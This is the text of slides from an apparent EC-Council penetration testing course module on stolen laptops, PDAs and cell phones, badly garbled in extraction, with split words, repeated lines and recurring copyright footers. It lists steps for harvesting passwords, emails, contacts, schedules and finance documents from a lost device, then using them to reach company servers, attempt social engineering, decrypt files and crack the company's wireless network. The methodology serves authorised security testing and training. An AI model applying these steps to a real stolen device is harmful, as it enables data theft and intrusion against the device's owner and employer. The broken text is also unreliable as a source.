ECSA/ LPT
ECSA/ LPT
EC
Council
Module XXVI I
EC
-
Council
Stolen Laptops, PDAs,
and Cell Phones
Penetration Testing
Penetration Testing Roadmap
Start Here
Information
Vulnerability External
Gathering
Analysis Penetration Testing
Fi ll
Router and
Internal
Fi
rewa
ll
Penetration Testing
Router

and

Switches
Penetration Testing
Internal

Network
Penetration Testing
IDS
Penetration Testing
Wireless
Network
Penetration Testing
Denial of
Service
Penetration Testing
Password
Cracking
Stolen Laptop, PDAs
and Cell Phones
Social
Engineering
Application
Cont’d
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Penetration Testing
Penetration Testin
g
Penetration Testing
Penetration Testin
g
Penetration Testing Roadmap


(cont
’
d)
(cont d)
Cont’d
Physical
Si
Database
Pii
VoIP
PiTi
S
ecur
i
t
y
Penetration Testing
P
enetrat
i
on test
i
ng
P
enetrat
i
on
T
est
i

n
g
Vi d
Vi
rus an
d

Trojan
Detection
War Dialing
VPN
Penetration Testing
Log
Management
Penetration Testing
File Integrity
Checking
Blue Tooth and
Hand held
Device
Penetration Testing
Telecommunication
And Broadband
Communication
Email Security
Penetration Testin
g
Security
Patches
Data Leakage

Penetration Testing
End Here
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Communication

Penetration Testing
g
Penetration Testing
Penetration

Testing
Stolen Laptop Testing
Cell phones and PDAs carry sensitive data.
Executives and mobile workers depend on
these devices everyday.
these devices everyday.
The loss of a PDA or BlackBerr
y
is e
q
uivalent
yq
to losing a laptop and the sensitive data
inside.
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Laptop Theft

If a laptop were lost
• What information of a strategic nature would
If a laptop were lost

be disclosed?

Real examples of this type of information include
pending mergers, new product intellectual property,
strate
g
ies and launch
p
lans
,
and
p
reviousl
y
undisclosed
gp,py
financial operating results.
• What information of a tactical nature would be
disclosed?
Examples include private compensation information
Examples include private compensation information
,

plans for organizational changes, proposals to clients,
and the myriad of similar information that can be
gained from reading a person's email, calendar,

t t ll ti f d t d d h t
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
con
t
ac
t
s,

or

co
ll
ec
ti
on

o
f d
ocumen
t
s

an
d
sprea
d
s
h

ee
t
s.
Laptop Theft (cont’d)
If a la
p
to
p
were lost
• What information about the company's
network or computing infrastructure
pp
network or computing infrastructure
would be revealed that would facilitate an
electronic attack?
Examples of this type of information include
usernames and passwords dial in numbers IP
usernames and passwords
,
dial in numbers
,
IP
addressing schemes, DNS naming conventions,
ISPs used, primary mail servers, and other
networking details related to connecting the
l h I i
l
aptop

to


t
h
e

corporate

or
I
nternet

env
i
ronment.

• What personal information about the
laptop owner can be obtained?
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Penetration Testing Steps
1
• Identify sensitive data in the devices
2
• Look for passwords
3
• Look for company infrastructure or finance documents
4
• Extract the address book and phone numbers
5

• Extract schedules and appointments
5
6
• Extract applications installed on these devices
•
Extract e
-
mail messages from these devices
7
•
Extract e
-
mail messages from these devices
8
• Gain access to server resources by using information you extracted
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
9
•
A
ttempt social engineering with the extracted information
Step 1: Identify Sensitive Data in
the Devices
the Devices
Laptops and PDA contain
Laptops and PDA contain
sensitive information, such as:
• Company finance documents.
El dh

•
E
xce
l
sprea
d
s
h
eets.
• Word documents.
• Email messages.
Operations plan
•
Operations plan
.
Look for sensitive data in these
documents
documents
.
What if this device gets into the
wrong hands?
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
wrong hands?
Look for Personal Information in
the Stolen Laptop
the Stolen Laptop
Bank Account Number
Internet Shopping Account

Credit Card Details
Check Tax Return
Pan Card Details
Passport Details
Check Resume of the Host
Check his Digital Signature
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Step 2: Look for Passwords
Search for the following passwords:
VNC password
Email account
p
asswords
p
Active directory passwords
Wbit hit d
W
e
b
s
it
e
hi
s
t
ory

passwor

d
s
Passwords stored in the registry
FTP passwords
SSH/Telnet passwords
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Application passwords
Step 3: Look for Company
Infrastructure or Finance Documents
Infrastructure or Finance Documents
Sometimes the laptop might
contain company infrastructure
•Building plans.
lf
contain company infrastructure
documents, such as:
•P
l
an o
f
operations.
• Overseas operations and procedures.
• Company handbooks or manuals.
•
Contracts and agreements.
Contracts and agreements.
• NDA documents.
• Bank statements.

• Auditing information.
I dt
What if this information gets into the wrong hands?
•
I
nsurance
d
ocumen
t
s.
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
What if this information gets into the wrong hands?
Step 4: Extract the Address
Book and Phone Numbers
Book and Phone Numbers
PDA d l t t i dd b k
PDA
an
d l
ap
t
ops

con
t
a
i
n


a
dd
ress
b
oo
k
Look for the followin
g
data:
•Name.
• Address.
Tl h b
g
•
T
e
l
ep
h
one

num
b
er.
• Cell phone number.
•Fax number.
•
Email address
•

Email address
.
• Birthdate.
• Notes.
•
Picture.
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Picture.
Step 5: Extract Schedules and
Appointments
Appointments
Look for schedules and a
pp
ointment

• What is the time and date of the meetin
g
?
pp
information in the PDA and laptop:
g
• Who are the attendees?
• What is the location of the meeting?
•
What is the agenda for the meeting?
What is the agenda for the meeting?
• Has the meeting confirmed?
• How long is the meeting?

EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Step 6: Extract Applications
Installed on these Devices
Installed on these Devices
Ali i l
A
pp
li
cat
i
ons

can

revea
l
sensitive data.
Look for data in the
installed application on
the laptop device.
Example:
• Finance software such as Quicken and
Microsoft Money can provide rich
information
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Step 7: Extract Email Messages

from these Devices
from these Devices
Email messages can provide a lot of sensitive
if i
i
n
f
ormat
i
on.
Sometimes you might find passwords and
access codes.
access codes.
Scan the entire email content for information
that could be used to gain access to the system.
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Step 8: Gain Access to Server Resources
b
y
Usin
g
Information
y
ou Extracted
yg y
Gain access to network resources using information from
Gain access to network resources using information from
the PDA and laptops.

EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Step 9: Attempt Social Engineering
with the Extracted Information
with the Extracted Information
The extracted information could be used for social
The extracted information could be used for social
engineering as well.
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Check for BIOS Password
Check whether the BIOS
p
assword
,/
boot
p
assword
/
hard
p,/p/
disk password is enabled.
Check whether BIOS setting has hard disk as a bootable
Check whether BIOS setting has hard disk as a bootable
device.
Check whether the user has different username and
password from the domain’s logon used on the laptop.
EC-Council

Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Look into the Encrypted File
Check whether any file is not proving clear test it
Check whether any file is not proving clear test it
means it is encrypted.
Try to decrypt the file using cryptographic tools.
Gather information from that file
Gather information from that file
.
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Check Cookies in Web Browsers
Check the following:
Check the following:
• Cookies
•History file
•Temp file
•Recycle bin
Check whether the above files contain any information in it.
Check whether any password file is available
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Check whether any password file is available
.
Install Software
Install software for changing the
d

• Try it for changing the existing password
passwor
d
:
Install data recovery software in the
la
p
to
p
:
• Use it to extract the data that has been deleted
pp
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Attempt to Enable Wireless
Switch on wireless or Bluetooth near the com
p
an
y
cam
p
us
py p
Scan for the LAN network of the company
Locate the LAN network and search SSID in the laptop
Check whether SSID is asking for password
Check password strength and try to break it by password cracking techniques
EC-Council
Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited
Enable wireless or Bluetooth to get connected with the network
Summary
All the information that is extracted from the steps mentioned are
All the information that is extracted from the steps mentioned
,
are
documented for analysis.
In the first step, the sensitive data in the device is identified such as
company finance documents, email messages, and Excel spreadsheets.
In the second step, we looked for passwords such as VNC, and email
account passwords .
Extraction of schedules and appointment details such as time, date, venue
of the meetin
g
s
,
attendees of the meetin
g,
and meetin
g
confirmation are
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
g, g, g
gathered.
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited

EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited